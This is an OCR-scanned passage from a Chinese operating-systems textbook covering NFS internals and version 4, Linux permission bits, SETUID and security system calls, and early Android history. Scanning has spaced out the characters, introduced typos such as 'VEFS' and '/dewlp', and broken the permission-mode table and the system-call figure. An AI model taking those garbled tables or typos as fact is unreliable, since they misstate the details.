录 ， 以 及 其 他 信息 。mount 程 序 解析 要 被 挂 载 的 远程 目录 并 找到 该 目录 所 在 的 NFS 服 务 器 ， 然 后 与 该 机 
器 连接 ， 请 求 远程 目录 的 文件 句柄 。 如 果 该 目录 存在 并 可 被 远程 挂 载 ， 服 务 器 就 返回 一 个 该 目录 的 文件 
句柄 。 最 后 ，mount 程 序 调用 mount 系 统 调 用 ， 将 该 句柄 传递 给 内 核 。 

然后 内 核 为 该 远程 目录 创建 一 个 v 节 点 ， 并 要 求 客 户 端 代码 (图 10-36 所 示 ) 在 其 内 部 表 中 创建 一 个 
r 节 点 (remote i-node) 来 保存 该 文件 句柄 。v 节 点 指向 r 节 点 。VFS 中 的 每 一 个 节点 最 终 要 么 包含 一 个 
指向 NFS 客 户 端 代码 中 r 节 点 的 指针 ， 要 么 包含 指向 一 个 本 地 文件 系统 的 i 节点 的 指针 (在 图 10-36 中 用 虚 
线 标 出 ) 。 因 此 ， 我 们 可 以 从 v 节 点 中 判断 一 个 文件 或 目录 是 本 地 的 还 是 远程 的 。 如 果 是 本 地 的 ， 可 以 定 
位 相应 的 文件 系统 和 i 节 点 。 如 果 是 远程 的 ， 可 以 找到 远程 主机 和 文件 句柄 。 

当 客 户 端 打 开 一 个 远程 文件 时 , 在 解析 路 径 名 的 某 个 时 刻 , 内 核 会 碰 到 挂 载 了 远程 文件 系统 的 目录 。 
内 核 看 到 该 目录 是 远程 的 ， 并 从 该 目录 的 v 节 点 中 找到 指向 r 节 点 的 指针 ， 然 后 要 求 NFS 客 户 端 代码 打开 
文件 。NFS 客 户 端 代码 在 与 该 目录 关联 的 远程 服务 器 上 查询 路 径 名 中 剩余 的 部 分 ， 并 返回 一 个 文件 句柄 。 
它 在 自己 的 表 中 为 该 远程 文件 创建 一 个 r 节 点 并 报告 给 VFS 层 。VFS 层 在 自己 的 表 中 为 该 文件 建立 一 个 指 
向 该 r 节 点 的 v 节 点 。 从 这 里 我 们 再 一 次 看 到 ， 每 一 个 打开 的 文件 或 目录 有 一 个 v 节 点 ， 要 么 指向 一 个 r 节 
点 ， 要 么 指向 一 个 i 节点 。 

返回 给 调用 者 的 是 远程 文件 的 一 个 文件 描述 符 。VFS 层 中 的 表 将 该 文件 描述 符 映射 到 v 节 点 。 注 意 ， 
服务 器 端 没 有 创建 任何 表 项 。 尽 管 服务 器 已 经 准备 好 在 收 到 请 求 时 提供 文件 句柄 ， 但 它 并 不 记录 哪些 文 
件 有 文件 句柄 ， 哪 些 文件 没有 。 当 一 个 文件 句柄 发 送 过 来 要 求 访问 文件 时 ， 它 检查 该 句柄 。 如 果 是 有 效 
的 句柄 ， 就 使 用 它 。 如 果 安 全 策略 被 启用 ， 验 证 包含 对 RPC 头 中 的 认证 密 钥 的 检验 。 

当 文 件 描 述 符 被 用 于 后 续 的 系统 调用 (例如 read) 时 ，VEFS 层 先 定位 相应 的 v 节 点 , :然后 根据 它 确 
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定 文件 是 本 地 的 还 是 远程 的 ， 同 时 确定 哪个 i 节 点 或 r 节 点 是 描述 该 文件 的 。 然 后 向 服务 器 发 送 一 个 消息 ， 
该 消息 包含 句柄 、 偏 移 量 (由 客户 端 维持 ， 而 不 是 服务 器 端 ) 和 字 节 数 。 出 于 效率 方面 的 考虑 ， 即 使 要 
传输 的 数据 很 少 ， 客 户 端 和 服务 器 之 间 的 数据 传输 也 使 用 大 数据 块 ， 通 常 是 8192 字 节 。 

当 请 求 消息 到 达 服 务 器 ， 它 被 送 到 服务 器 的 VFS 层 ， 在 那里 将 判断 所 请 求 的 文件 在 哪个 本 地 文件 系 
统 中 。 然 后 ，VFS 层 调用 本 地 文件 系统 去 读 取 并 返回 请 求 的 字 节 。 随 后 ， 这 些 数 据 被 传送 给 客户 端 。 客 
户 端 的 VFS 层 接收 到 它 所 请 求 的 这 个 8KB 块 之 后 ， 又 自动 发 出 对 下 一 个 块 的 请 求 ， 这 样 当 我 们 需要 下 一 
个 块 时 就 可 以 很 快 地 得 到 。 这 个 特性 称 为 预 读 (read ahead) ， 它 极 大 地 提高 了 性 能 。 

客户 端 向 服务 器 写 文 件 的 过 程 是 类 似 的 。 文 件 也 是 以 8KB 块 为 单位 传输 。 如 果 一 个 write 系 统 调用 提 
供 的 数据 少 于 8KB， 则 数据 在 客户 端 本 地 累积 ， 直 到 8KB 时 才 发 送 给 服务 器 。 当 然 ， 当 文件 关闭 时 ， 所 
有 的 数据 都 立即 发 送 给 服务 器 。 

另 一 个 用 来 改善 性 能 的 技术 是 缓存 ， 与 在 通常 的 UNIX 系 统 中 的 用 法 一 样 。 服 务 器 缓存 数据 以 避免 
磁盘 访问 ， 但 这 对 客户 端 而 言 是 不 可 见 的 。 客 户 端 维 护 两 个 缓存 : 一 个 缓存 文件 属性 (i 节点 )， 另 一 个 
缓存 文件 数据 。 当 需要 i 节 点 或 文件 块 时 ， 就 在 缓存 中 检查 有 无 符合 的 数据 。 如 果 有 ， 就 可 以 避免 网 络 
流量 了 。 

客户 端 缓存 对 性 能 提升 起 到 很 大 帮助 的 同时 ， 也 带 来 了 一 些 令 人 讨厌 的 问题 。 假 设 两 个 客户 端 都 组 
存 了 同一 个 文件 块 ， 并 且 其 中 一 个 客户 端 修改 了 它 。 当 另 一 个 客户 读 该 块 时 ， 它 读 到 的 是 旧 的 数据 值 。 
这 时 缓存 是 不 一 致 的 。 

考虑 到 这 个 问题 可 能 带 来 的 严重 性 后 果 ，NFS 实 现 做 了 一 些 事情 来 缓解 这 一 问题 。 第 一 ， 为 每 个 组 
存 了 的 块 关联 一 个 定时 器 。 当 定时 器 到 期 时 ， 缓 存 的 项 目 就 被 丢弃 。 通 常 ， 数 据 块 的 时 间 是 3 秒 ， 目 录 
块 的 时 间 是 30 秒 。 这 稍微 减少 了 一 些 风 险 。 另 外 ， 当 打开 一 个 有 缓存 的 文件 时 ， 会 向 服务 器 发 送 一 个 消 
息 来 找 出 文件 最 后 修改 的 时 间 。 如 果 最 后 修改 时 间 晚 于 本 地 缓存 时 间 ， 那 么 旧 的 副本 被 丢弃 ， 新 副本 从 
服务 器 取 回 。 最 后 ， 每 30 秒 缓存 定时 器 到 期 一 次 ,缓存 中 所 有 的 “ 脏 ” 块 ( 即 修改 过 的 块 ) 都 发 送 到 服 
务 器 。 尽 管 并 不 完美 ,但 这 些 修补 使 得 系统 在 多 数 实际 环境 中 高 度 可 用 。 

4. NFS 第 4 版 

网 络 文件 系统 第 4 版 是 为 了 简化 其 以 前 版 本 的 一 些 操作 而 设计 的 。 相 对 于 上 面 描述 的 第 3 版 NFS， 
第 4 版 NFS 是 有 状态 的 文件 系统 。 这 样 就 允许 对 远程 文件 调用 open 操 作 ， 因 为 远程 NFS 服 务 器 将 维护 包 
括 文件 指针 在 内 的 所 有 文件 系统 相关 的 结构 。 读 操作 不 再 需要 包含 绝对 读 取 范 围 了 ， 而 可 以 从 文件 指针 
上 次 所 在 的 位 置 开始 增加 。 这 就 使 消息 变 短 ， 同 时 可 以 在 一 次 网 络 传输 中 捆绑 多 个 第 3 版 NFS 的 操作 。 

第 4 版 NFS 的 有 状态 性 使 得 将 第 3 版 NFS 中 多 个 协议 (在 本 节 前 面部 分 描述 过 ) 集成 为 一 个 一 致 的 协 
议 变 得 容易 。 这 样 就 没有 必要 再 为 挂 载 、 缓 存 、 加 锁 或 者 安全 操作 支持 单独 的 协议 了 。 第 4 版 NFS 在 
Linux (和 UNIX) 和 Windows 文 件 系 统 语义 下 都 工作 得 更 好 。 


10.7 Linux 的 安全 性 


Linux 作 为 MINIX 和 UNIX 的 复制 品 ， 几 乎 从 一 开始 就 是 一 个 多 用 户 系统 。 这 段 历史 意味 着 Linux 从 
早期 开始 就 建立 了 安全 和 信息 访问 控制 机 制 。 在 接 下 来 的 几 节 里 ， 我 们 将 关注 Linux 安全 性 的 一 些 方面 。 


10.7.1 基本 概念 

一 个 Linux 系 统 的 用 户 群 体 由 一 定数 量 的 注册 用 户 组 成 ， 其 中 每 个 用 户 拥 有 一 个 唯一 的 UID (用 户 
ID)。UID 是 介 王 0 到 65 535 之 间 的 一 个 整数 。 文 件 (进程 及 其 他 资源 ) 都 标记 了 它 的 所 有 者 的 UID。 尽 
管 可 以 改变 文件 所 有 权 ， 但 是 默认 情况 下 ， 文 件 的 所 有 者 是 创建 该 文件 的 用 户 。 

用 户 可 以 被 分 组 ， 其 中 每 组 同样 由 一 个 16 位 的 整数 标记 ， 叫 作 GID (组 ID)。 给 用 户 分 组 通过 在 系 
统 数 据 库 中 添加 一 条 记录 指明 哪个 用 户 属于 哪个 组 的 方法 手工 (由 系统 管理 员 ) 完成 。 一 个 用 户 可 以 同 
时 属于 多 个 组 。 为 简单 起 见 ， 我 们 不 再 深入 讨论 这 个 问题 。 

Linux 中 的 基本 安全 机 制 很 简单 。 每 个 进程 记录 它 的 所 有 者 的 UID 和 GID。 当 一 个 文件 被 创建 时 ， 它 
的 UID 和 GID 被 标记 为 创建 它 的 进程 的 UID 和 GID。 该 文件 同时 获得 由 该 进程 决定 的 一 些 权 限 。 这 些 权 限 
指定 所 有 者 、 所 有 者 所 在 组 的 其 他 用 户 及 其 他 用 户 对 文件 具有 什么 样 的 访问 权限 。 对 于 这 三 类 用 户 而 言 ， 
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六 在 的 访问 权限 为 读 、 写 和 执行 ， 分 别 由 r、w 和 x 标记 。 当 然 ， 执 行文 件 的 权限 仅 当 文件 是 可 执行 二 
制程 序 时 才 有 意义 。 试 图 执行 一 个 拥有 执行 权限 的 非 可 执行 文件 〈 即 ， 并 非 由 一 个 合法 的 文件 头 开始 的 
文件 ) 会 导致 错误 。 因 为 有 三 类 用 户 ， 每 类 用 户 的 权限 由 3 个 比特 位 标记 ， 那 么 9 个 比特 位 就 足够 标记 访 
问 权 限 。 图 10-37 给 出 了 一 些 9 位 数字 及 其 含义 的 例子 : 


aR 
所 有 者 和 组 可 以 读 、 写 和 和 


[110100100 | rwr- | 所 有 者 可 以 读 和 写 ， 组 可 以 读 
所 有 者 可 以 读 和 写 ; 其 他 人 可 以 读 


所 有 者 拥有 所 有 权限 ， 其 他 人 可 以 读 和 执行 
000000000 | --------- | 所 有 人 都 不 拥有 任何 权限 





图 10-37 文件 保护 模式 的 例子 

图 10-37 前 两 行 的 意思 很 清楚 ， 准 许 所 有 者 以 及 与 所 有 者 同 组 的 人 所 有 权限 。 接 下 来 的 一 行 准许 所 
有 者 同 组 用 户 读 权限 但 是 不 可 以 改变 其 内 容 ， 而 其 他 用 户 没有 任何 权限 。 第 四 行 通常 用 于 所 有 者 想 要 公 
开 的 数据 文件 。 类 似 地 ， 第 五 行 通 常用 于 所 有 者 想 要 公开 的 程序 。 第 六 行 剥夺 了 所 有 用 户 的 任何 权利 。 
这 种 模式 有 时 用 于 伪 文 件 来 实现 相互 排斥 ， 因 为 想 要 创建 一 个 同名 的 文件 的 任何 行为 都 将 失败 。 如 果 多 
个 进程 同时 想 要 创建 这 样 一 个 文件 作为 锁 ， 那 么 只 有 一 个 能 够 创建 成 功 。 最 后 一 个 例子 相当 奇怪 ， 因 为 
它 给 组 以 外 其 他 用 户 更 多 的 权限 。 但 是 ， 它 的 存在 是 符合 保护 规则 的 。 幸 运 的 是 ， 尽 管 没有 任何 文件 访 
问 权限 ， 但 是 所 有 者 可 以 随后 改变 保护 模式 。 

UID 为 0 的 用 户 是 一 个 特殊 用 户 ， 称 为 超级 用 户 (或 者 根 用 户 ) 。 超 级 用 户 能 够 读 和 写 系 统 中 的 任何 
文件 ， 不 论 这 个 文件 为 谁 所 有 ， 也 不 论 这 个 文件 的 保护 模式 如 何 。UID 为 0 的 进程 拥有 调用 一 小 部 分 受 
保护 的 系统 调用 的 权限 ， 而 普通 用 户 是 不 能 调用 这 些 系统 调用 的 。 一 般 而 言 ， 只 有 系统 管理 员 知 道 超级 
用 户 的 密码 ， 但 是 很 多 学 生 寻 找 系统 安全 漏洞 想 让 自己 能 够 不 用 密码 就 可 以 以 超级 用 户 的 身份 登录 ， 并 
且 认 为 这 是 一 种 了 不 起 的 行为 。 管 理 人 员 往 往 对 这 种 行为 很 不 满 。 

目录 也 是 一 种 文件 ， 并 且 具 有 普通 文件 一 样 的 保护 模式 。 不 同 的 是 ， 目 录 的 x 比特 位 表示 查找 权限 
而 不 是 执行 权限 。 因 此 ， 如 果 一 个 目录 具有 保护 模式 rwxr-xr-x， 那 么 它 允 许 所 有 者 读 、 写 和 查找 目录 ， 
但 是 其 他 人 只 可 以 读 和 查找 ， 而 不 允许 从 中 添加 或 者 删除 目录 里 的 文件 。 

与 MO 相关 的 特殊 文件 拥有 与 普通 文件 一 样 的 保护 位 。 这 种 机 制 可 以 用 来 限制 对 IO 设备 的 访问 权限 。 
例如 ， 假 设 打印 机 是 特殊 文件 ，/dewlp， 可 以 被 根 用 户 或 者 一 个 叫 守护 进程 的 特殊 用 户 拥有 ， 具 有 保护 
模式 rw------- ， 从 而 阻止 其 他 所 有 人 对 打印 机 的 访问 权限 。 毕 竟 ， 如 果 每 个 人 都 可 以 任意 使 用 打印 机 ， 
那么 就 会 发 生 混乱 。 

当然 ， 让 /dev/lp 被 守护 进程 以 保护 模式 rw------- 拥有 ， 意 味 着 其 他 任何 人 都 不 可 以 使 用 打印 机 ， 尽 
管 有 很 多 早期 死亡 的 无 辜 的 trees， 但 是 这 种 做 法 限制 了 很 多 合法 的 打印 要 求 。 事 实 上 ， 人 允许 对 IO 设备 
及 其 他 系统 资源 进行 受 控 访 问 的 做 法 具有 一 个 更 普遍 的 问题 。 

这 个 问题 通过 增加 一 个 保护 位 SETUID 到 之 前 的 9 个 比特 位 来 解决 。 当 一 个 进程 的 SETUID 位 打开 ， 
它 的 有 效 UID 将 变 成 相应 可 执行 文件 的 所 有 者 的 UID ， 而 不 是 当前 使 用 该 进程 的 用 户 的 UID 。 当 一 个 进 
程 试图 打开 一 个 文件 时 ， 系 统 检查 的 将 是 它 的 有 效 UID ， 而 不 是 真正 的 UID 。 将 访问 打印 机 的 程序 设置 
为 被 守护 进程 所 有 ， 同 时 打开 SETUID 位 ， 这 样 任何 用 户 都 可 以 执行 该 程序 ， 并 拥有 守护 进程 的 权限 
(例如 访问 /dep/lp)， 但 是 这 仅 限于 运行 该 程序 (例如 给 打印 任务 排序 )。 

许多 敏感 的 Linux 程 序 通 过 打开 SETUID 位 被 根 用 户 所 有 。 例 如 ， 人 允许 用 户 改变 密码 的 程序 需要 写 
password 文 件 。 人 允许 password 文 件 公 开 可 写 显然 不 是 个 好 主意 。 解 决 的 方法 是 ， 提 供 一 个 被 根 用 户 所 有 
同时 SETUID 位 打开 的 程序 。 虽 然 该 程序 拥有 对 password 文 件 的 全 部 权限 ， 但 是 它 仅仅 改变 调用 该 程序 
的 用 户 的 密码 ， 而 不 允许 其 他 任何 的 访问 权限 。 
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除了 SETUID 位 ， 还 有 一 个 SETGID 位 ， 工 作 原理 同 SETUID 类 似 。 它 暂时 性 地 给 用 户 该 程序 的 有 效 
GID。 然 而 在 实践 中 ， 这 个 位 很 少 用 到 。 


10.7.2 Linux 中 安全 相关 的 系统 调用 

只 有 为 数 不 多 的 几 个 安全 性 相关 的 系统 调用 。 其 中 最 重要 的 几 个 在 图 10-38 中 列 出 。 最 常用 到 的 安 
全 相关 的 系统 调用 是 chmod。 它 用 来 改变 保护 模式 。 例 如 : 

s=chmod("/usr/ast/newgame",0755); 
它 把 newgame 文 件 的 保护 模式 修改 为 rwxr-xrx， 这 样 任何 人 都 可 以 运行 该 程序 (0755 是 一 个 八进制 常数 ， 
这 样 表示 很 方便 ， 因 为 保护 位 每 三 个 分 为 一 组 )。 只 有 该 文件 的 所 有 者 和 超级 用 户 才 有 权利 改变 保护 模式 。 


| me 
















图 10-38 一 些 与 安全 相关 的 系统 调用 。 当 错 误 发 生 时 ， 返 回 值 为 -1，uid 和 gid 分 别 是 UID 和 GID。 参 数 
的 意思 不 言 自明 


access 系 统 调用 检验 用 实际 的 UID 和 GID 对 某 文件 是 否 拥有 特定 的 权限 。 对 于 根 用 户 所 拥有 的 并 设 
置 了 SETUID 的 程序 ， 我 们 需要 这 个 系统 调用 来 避免 安全 违例 。 这 样 的 程序 可 以 做 任何 事情 ， 有 了 时 需要 
这 样 的 程序 判断 是 否 允 许 用 户 执行 某 种 访问 。 让 程序 通过 访问 判断 显然 是 不 行 的 ， 因 为 这 样 的 访问 总 能 
成 功 。 使 用 access 系 统 调 用 ， 程 序 就 能 知道 用 实际 的 UID 和 GID 是 否 能 够 以 一 定 的 权限 访问 文件 。 

接 下 来 的 四 个 系统 调用 返回 实际 的 和 有 效 的 UID 和 GID。 最 后 的 三 个 只 能 够 被 超级 用 户 使 用 ， 它 们 
改变 文件 的 所 有 者 以 及 进程 的 UID 和 GID。 


10.7.3 Linux 中 的 安全 实现 

当 用 户 登录 时 ， 登 录 程序 login (为 根 用 户 所 有 且 SETUID 打 开 ) 要 求 输入 登录 名 和 密码 。 它 首先 计 
算 密码 的 散 列 值 ， 然 后 在 /etc/passwd 文 件 中 查找 ， 看 是 否 有 相 匹 配 的 项 (网络 系 统 工作 得 稍 有 不 同 ) 。 
使 用 散 列 的 原因 是 防止 密码 在 系统 中 以 非 加密 的 方式 存在 。 如 果 密 码 正 确 ， 登 录 程 序 在 /etc/passwd 中 读 
取 该 用 户 选择 的 shell 程 序 的 名 称 ， 例 如 可 能 是 bash， 但 是 也 有 可 能 是 其 他 的 shell， 例 如 csh 或 者 ksh。 然 
后 登录 程序 使 用 setuid 和 setgid 来 使 自己 的 UID 和 GID 变 成 用 户 的 UID 和 GID (注意 ， 它 一 开始 的 时 候 是 
根 用 户 所 有 且 SETUID 打 开 ) 。 然 后 它 打开 键盘 作为 标准 输入 (文件 描述 符 0) ， 屏 幕 为 标准 输出 (文件 描 
述 符 1) ， 屏 幕 为 标准 错误 输出 (文件 描述 符 2) 。 最 后 ， 执 行 用 户 选择 的 shell 程 序 ， 因 此 终止 自己 。 

到 这 里 ， 用 户 选择 的 shell 已 经 在 运行 ， 并 且 被 设置 了 正确 的 UID 和 GID， 标 准 输入 、 标 准 输出 和 标 
准 错误 输出 都 被 设置 成 了 默认 值 。 它 创建 任何 子 进程 (也 就 是 用 户 输入 的 命令 ) 都 将 自动 继承 shell 的 
UID 和 GID， 所 以 它们 将 拥有 正确 的 UID 和 GID， 这 些 进程 创建 的 任何 文件 也 具有 这 些 值 。 

当 任何 进程 想 要 打开 一 个 文件 ， 系 统 首先 将 文件 的 i 节 点 所 记录 的 保护 位 与 用 户 的 有 效 UID 和 有 效 
GID 对 比 ， 来 检查 访问 是 否 被 允许 。 如 果 允 许 访问 ， 就 打开 文件 并 且 返 回 文件 描述 符 ， 否 则 不 打开 文件 ， 
返回 -1。 在 接 下 来 的 read 和 write 中 不 再 检查 权限 。 因 此 ， 当 一 个 文件 的 保护 模式 在 它 被 打开 后 修改 ， 
新 模式 将 无 法 影响 已 经 打开 该 文件 的 进程 。 

Linux 安 全 模型 及 其 实现 在 本 质 上 跟 其 他 大 多 数 传统 的 UNIX 系统 相同 。 


实例 研究 1: UNIX, Linux#eAndroid 455 


10.8 Android 


Android 是 一 种 比较 新 的 操作 系统 ， 专 为 运行 在 移动 智能 设备 上 而 设计 。 它 基于 Linux 内 核 一 一 
Android 只 是 将 少许 新 的 概念 引入 Linux 内 核 之 中 ， 它 使 用 了 你 已 经 很 熟悉 的 大 多 数 Linux 设 施 (进程 、 
用 户 ID、 文 件 系 统 、 调 度 等 ) ， 但 是 Android 是 以 与 其 最 初 意图 非常 不 一 样 的 方式 使 用 这 些 设 施 的 。 

自问 世 以 来 的 5 年 闻 ，Android 已 经 成 长 为 使 用 最 为 广泛 的 智能 手机 操作 系统 之 一 。Android 普 及 的 
因为 之 一 是 搭 上 了 智能 手机 爆炸 式 增长 的 快车 ， 另 一 个 原因 是 移动 设备 制造 商 可 以 免费 获得 Android 并 
将 其 用 在 自己 的 设备 之 中 。Android 还 是 一 种 开源 平台 ， 这 使 得 它 可 以 定制 化 ， 适 用 于 形形色色 的 设备 。 
Android 不 但 在 以 消费 者 为 中 心 的 设备 (例如 平板 电脑 、 电 视 、 游 戏 机 以 及 媒体 播放 器 ) 上 流行 ， 在 这 
样 的 设备 上 ， 第 三 方 应 用 生态 系统 是 有 益 的 ; 而 且 Android 还 越 来 越 多 地 用 作 需 要 图 形 用 户 界 面 
(Graphical User Interface, GUI) 的 专用 设备 的 代入 式 OS， 例 如 VOIP 电话 、 智 能 手表 、 汽 车 仪表 盘 、 医 
疗 设备 以 及 家 用 电器 。 i 

Android 操 作 系统 的 大 部 分 是 用 高 级 语言 编写 的 ， 即 Java 程 序 设计 语言 。 内 核 和 大 量 的 低层 库 是 用 C 
和 C++ 编写 的 。 不 但 系统 的 大 部 分 是 用 Java 编 写 的 ， 而 且 除 了 少量 例外 ， 整 个 应 用 程序 API 也 是 用 Java 编 
写 和 发 布 的 。Android 中 用 Java 编 写 的 部 分 倾向 于 遵循 完全 的 面向 对 象 设计 ， 这 正 是 该 语言 所 鼓励 的 。 
10.8.1 Android 与 Google 

Android 是 一 种 异 于 常规 的 操作 系统 ， 它 将 开源 代码 和 闭 源 第 三 方 应 用 程序 结合 在 一 起 。Android 的 
开源 部 分 称 为 Android 开 源 项 目 (Android Open Source Project，AOSP) ， 它 是 完全 开放 的 ， 任 何人 都 可 
以 免费 使 用 和 修改 。 

Android 的 一 个 重要 目标 是 支持 丰富 的 第 三 方 应 用 程序 环境 ， 这 就 要 求 Android 具 有 稳定 的 实现 和 
API， 从 而 使 应 用 程序 得 以 在 其 上 和 运行。 然而， 在 开源 世界 中 每 一 个 设备 厂商 都 可 以 随 其 意愿 定制 平台 ， 
于 是 兼容 性 问题 很 快 就 产生 了 。 这 就 需要 有 某 种 方法 来 控制 这 一 冲突 。 

在 Android 针 对 这 一 问题 的 解决 方案 中 ， 有 一 部 分 是 兼容 性 定义 文档 (Compatibility Definition 
Document，CDD)， 它 描述 了 为 了 与 第 三 方 应 用 程序 相 兼 容 ，Android 所 必须 遵循 的 行为 方式 。 这 一 文 
档 本 身 描述 了 为 了 成 为 兼容 的 Android 设 备 所 必需 的 条 件 。 然 而 ， 因 为 缺乏 某 种 方法 来 强制 实施 这 样 的 
兼容 性 ， 于 是 它 经 常 被 忽略 ， 因 此 需要 某 种 额外 的 机 制 来 做 这 件 事 。 

Android 解 决 这 一 问题 的 方法 是 允许 在 开源 平台 之 上 创建 额外 的 私有 服务 ， 以 这 样 的 方式 来 提供 平 
台 本 身 不 能 实现 的 服务 (一般 情况 下 是 基于 云 的 )。 因 为 这 些 服 务 是 私有 的 ， 所 以 它们 可 以 限制 包含 在 
其 中 的 设备 ， 这 就 要 求 这 些 设备 具有 CDD 兼 容 性 。 

Google 实 现 的 Android 能 够 支持 多 种 多 样 的 私有 云 服务 ， 在 Google 广 泛 的 服务 系列 中 具有 代表 性 的 
案例 包括 Gmail、 日 程 表 和 通讯 录 同 步 、 云 到 设备 的 消息 传递 以 及 许多 其 他 服务 ， 有 些 服务 对 用 户 而 言 
是 可 见 的 ， 有 些 则 不 可 见 。 就 发 布 兼容 的 应 用 程序 而 言 ， 最 重要 的 服务 是 Google Play, 

Google Play 是 Google 的 在 线 Android 应 用 程序 商店 。 一 般 来 说 ， 当 开发 商 创建 Android 应 用 程序 时 ， 他 
们 会 用 Google Play 来 发 布 。 因 为 Google Play (或 者 任何 其 他 应 用 程序 商店 ) 是 一 种 渠道 ， 应 用 程序 通过 这 
一 渠道 传送 到 Android 设 备 上 ， 所 以 私有 服务 负责 确保 应 用 程序 在 它们 所 传送 到 的 设备 上 能 够 正常 工作 。 

Google Play 使 用 了 两 个 主要 的 机 制 来 保证 兼容 性 。 第 一 个 并 且 是 最 重要 的 机 制 ， 就 是 要 求 通过 它 得 
以 上 市 的 任何 设备 必须 按照 CDD 的 要 求 具备 兼容 性 。 这 就 保证 了 跨 设备 的 行为 底线 。 此 外 ，Google Play 
必须 了 解 应 用 程序 要 求 设备 所 具备 的 任何 功能 特性 (例如 为 了 执行 地 图 导航 必须 存在 GPS) ， 这 样 一 来 
在 缺乏 这 些 功能 特性 的 设备 上 应 用 程序 就 是 不 可 用 的 。 

10.8.2 Android 的 历史 

Android 作 为 一 家 创业 公司 在 其 早期 发 展 阶段 即 被 Google 收 购 ， 在 收购 Android 之 后 ，Google 于 2005 
年 左右 开发 了 Android。 今 天 市 面 上 的 Android 平 台 的 几乎 全 部 开发 工作 都 是 在 Google 的 管理 之 下 完成 的 。 

1. 早期 发 展 

Android 有 限 公司 是 一 家 软件 公司 ， 创 立 该 公司 的 目的 是 为 智能 移动 设备 开发 软件 。Android 最 初 的 
着 眼 点 是 照相 机 ， 之 后 目光 很 快 就 切换 到 智能 手机 ， 因 为 智能 手机 拥有 更 大 的 潜在 市 场 。 这 一 最 初 目标 
发 展 的 结果 是 解决 了 当时 在 移动 设备 开发 中 遇 到 的 难题 ， 方 法 是 引入 构建 于 Linux 之 上 的 一 个 开放 平台 ， 
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这 样 就 有 可 能 获得 广泛 的 应 用 。 

在 这 一 时 期 实现 了 平台 的 用 户 界面 原型 ， 以 展示 隐 含 在 其 背后 的 理念 。 平 台 本 身 则 意 在 三 种 重要 的 
JavaScript、Java 和 C++， 以 期 支持 丰富 的 应 用 开发 环境 。 

Google 于 2005 年 7 月 收购 了 Android， 之 后 提供 了 必要 的 资源 和 云 服 务 支 持 ， 作 为 完整 的 产品 继续 
Android 开 发 。 在 这 一 时 期 ， 有 一 个 相当 小 的 工程 师 团 队 紧密 地 协同 工作 ， 开 始 开发 该 平台 的 核心 基础 
设施 以 及 高 级 应 用 开发 的 基本 库 。 

2006 年 年 初 ， 计 划 发 生 了 重要 的 改变 : 平台 不 再 支持 多 种 程序 设计 语言 ， 而 是 将 其 应 用 开发 完全 聚 
焦 于 Java 程 序 设计 语言 。 这 是 一 个 艰难 的 改变 ， 因 为 原来 的 多 语言 方法 由 于 拥有 “世上 最 好 的 一 切 ” 而 
在 表面 上 使 每 个 人 都 感到 高 兴 ， 而 聚焦 于 一 种 语言 对 于 更 喜欢 其 他 语言 的 工程 师 来 说 会 觉得 是 大 踏步 的 
倒退 。 

然而 ， 试 图 使 每 个 人 都 感到 高 兴 很 容易 造成 没有 人 感到 高 兴 。 构 建 三 组 不 同 语言 的 API 比 起 聚焦 于 
单一 的 语言 需要 更 多 的 努力 ， 从 而 大 大 降低 每 一 种 语言 API 的 质量 。 聚 焦 于 Java 语 言 的 决策 对 于 平台 质 
量具 有 极 高 的 价值 ， 而 且 使 开发 团队 能 够 满足 重要 的 截止 期 限 是 至 关 重 要 的 。 

随 着 开发 工作 的 进展 ，Android 平 台 与 最 终 会 安装 在 其 上 的 应 用 一 同 紧 密 地 进行 开发 。Google 已 经 
拥有 多 种 多 样 的 服务 一 一 包括 Gmail、Maps、Calendar、YouTube， 当 然 还 有 Search 这 些 都 会 发 布 在 
Android 之 上 。 在 早期 平台 上 实现 这 些 应 用 时 获得 的 经 验 反馈 到 了 设计 之 中 ， 这 一 伴随 应 用 的 重复 过 程 
使 得 平台 中 的 许多 设计 缺陷 在 其 开发 的 早期 就 能 够 得 到 解决 。 

大 多 数 早期 应 用 程序 开发 是 在 没有 多 少 底层 平台 实际 可 供 开 发 者 使 用 的 条 件 下 完成 的 。 平 台 通常 是 
全 部 在 一 个 进程 中 运行 的 ， 也 就 是 说 ， 通 过 在 宿主 计算 机 上 作为 单一 的 进程 而 运行 的 “模拟 器 ”来 运行 
全 部 系统 和 应 用 程序 。 实 际 上 现 如 今 仍然 存在 某 些 这 种 老式 实现 的 残余 ， 例 如 在 Android 程 序 员 用 于 编 
写 应 用 程序 的 SDK (Software Development Kit， 软 件 开发 工具 包 ) 中 依然 存在 Application.onTerminate 
方法 。 

2006 年 6 月 ， 有 两 款 硬 件 设 备 被 选中 作为 规划 产品 的 软件 开发 目标 。 第 一 款 的 代码 名 为 Sooner， 基 
于 一 种 已 有 的 智能 手机 ， 具 有 QWERT 键 盘 和 不 具备 触摸 输入 功能 的 屏幕 。 这 款 设备 的 目标 是 借助 已 有 
设备 的 杠杆 作用 使 最 初 产品 尽快 上 市 。 第 二 款 目标 设备 代码 名 为 Dream， 它 是 为 Android 特 别 设计 的 ， 为 
的 是 作为 完整 的 愿景 而 运行 。 它 包括 一 块 巨大 的 (就 当时 而 言 ) 触摸 屏 、 滑 盖 式 QWERT 键 盘 、3G 无 线 
(用 于 更 快 的 Web 浏 览 )、 加 速度 计 、GPS 以 及 罗盘 (用 以 支持 Google Maps) 等 。 

随 着 软件 的 日 程 安排 变 得 日 益 清 晰 ， 两 款 硬 件 日 程 安排 中 的 不 合理 之 处 也 日 益 彰 显 。 到 Sooner 有 可 
能 发 行 之 时 ， 硬 件 或 许 早 就 过 时 了 ， 并 且 在 Sooner 上 付出 的 努力 排挤 了 更 为 重要 的 Dream 设 备 。 为 解决 
这 一 问题 ，Android 决 定 放弃 把 Sooner 作 为 目标 设备 (尽管 在 该 硬件 上 的 开发 又 持续 了 一 段 时 间 直 到 准 
备 好 新 的 硬件 ) ， 从 而 把 精力 全 部 集中 到 Dream 上 。 

2. Android 1.0 

Android 平 台 首次 可 用 是 2007 年 11 月 发 行 的 SDK 预 览 版 。 它 包含 运行 完整 Android 设 备 系统 映像 和 核 
心 应 用 程序 的 硬件 设备 仿真 器 、API 文 档 以 及 开发 环境 。 此 时 此 刻 ， 核 心 设计 和 实现 已 经 准备 就 绪 ， 并 
且 在 许多 方面 与 我 们 将 要 讨论 的 现代 Android 系 统 体 系 结 构 极 为 相似 。 发 布 会 还 包括 运行 在 Sooner 和 
Dream 硬 件 之 上 的 平台 视频 演示 。 

